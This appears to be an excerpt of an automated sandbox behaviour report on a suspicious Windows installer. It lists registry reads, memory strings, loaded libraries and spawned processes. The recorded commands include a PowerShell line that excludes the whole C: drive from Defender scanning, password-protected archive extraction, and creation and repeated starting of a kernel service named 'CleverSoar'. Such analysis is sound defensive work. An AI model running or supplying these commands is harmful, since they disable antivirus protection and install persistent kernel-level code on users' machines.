Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: propsys.dllJump to behavior
